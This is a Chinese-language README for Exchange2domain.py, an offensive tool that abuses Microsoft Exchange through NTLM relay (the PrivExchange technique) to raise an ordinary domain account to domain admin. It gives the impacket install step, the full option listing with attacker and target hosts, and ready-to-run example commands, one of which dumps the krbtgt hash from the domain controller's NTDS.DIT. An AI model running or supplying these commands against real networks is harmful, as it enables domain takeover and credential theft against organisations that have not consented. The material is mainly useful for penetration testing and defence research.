privexchange 的全合一工具。你只需要开放 Web 服务器端口,因此无需高权限。
精彩文章!利用 Exchange:一次 API 调用即可获得域管理员权限。
这些工具需要 impacket。你可以通过 pip 安装:pip install impacket。
usage: Exchange2domain.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
[--hashes HASHES] [--no-ssl]
[--exchange-port EXCHANGE_PORT] -ah ATTACKER_HOST
[-ap ATTACKER_PORT] -th TARGET_HOST
[-exec-method [{smbexec,wmiexec,mmcexec}]]
[--exchange-version EXCHANGE_VERSION]
[--attacker-page ATTACKER_PAGE]
[--just-dc-user USERNAME] [--debug]
HOSTNAME
通过滥用 Exchange 将你的权限交换为域管理员权限。与 ntlmrelayx 配合使用
位置参数:
HOSTNAME Exchange 服务器的主机名/IP
可选参数:
-h, --help 显示此帮助信息并退出
-u USERNAME, --user USERNAME
用于认证的用户名
-d DOMAIN, --domain DOMAIN
用户所在的域(FQDN 或 NETBIOS 域名)
-p PASSWORD, --password PASSWORD
认证密码,如果未指定且未提供 NT:NTLM 哈希,则会提示输入
--hashes HASHES LM:NLTM 哈希
--no-ssl 不使用 HTTPS(在 80 端口连接)
--exchange-port EXCHANGE_PORT
替代 EWS 端口(默认:443 或 80)
-ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
攻击者主机名或 IP
-ap ATTACKER_PORT, --attacker-port ATTACKER_PORT
中继攻击运行的端口(默认:80)
-th TARGET_HOST, --target-host TARGET_HOST
DC 的主机名或 IP
-exec-method [{smbexec,wmiexec,mmcexec}]
在目标上使用的远程执行方法(仅在使用 -use-vss 时)。默认:smbexec
--exchange-version EXCHANGE_VERSION
目标的 Exchange 版本(默认:Exchange2013,可选:Exchange2010,Exchange2010_SP1,Exchange2010_SP2,Exchange2013,Exchange2013_SP1,Exchange2016)
--attacker-page ATTACKER_PAGE
在攻击者服务器上请求的页面(默认:/privexchange/)
--just-dc-user USERNAME
仅提取指定用户的 NTDS.DIT 数据。仅适用于 DRSUAPI 方法。
--debug 启用调试输出
示例:
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip

如果你只想转储 krbtgt,请使用 --just-dc-user。
示例:
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
自动备份旧 SD 以便恢复。
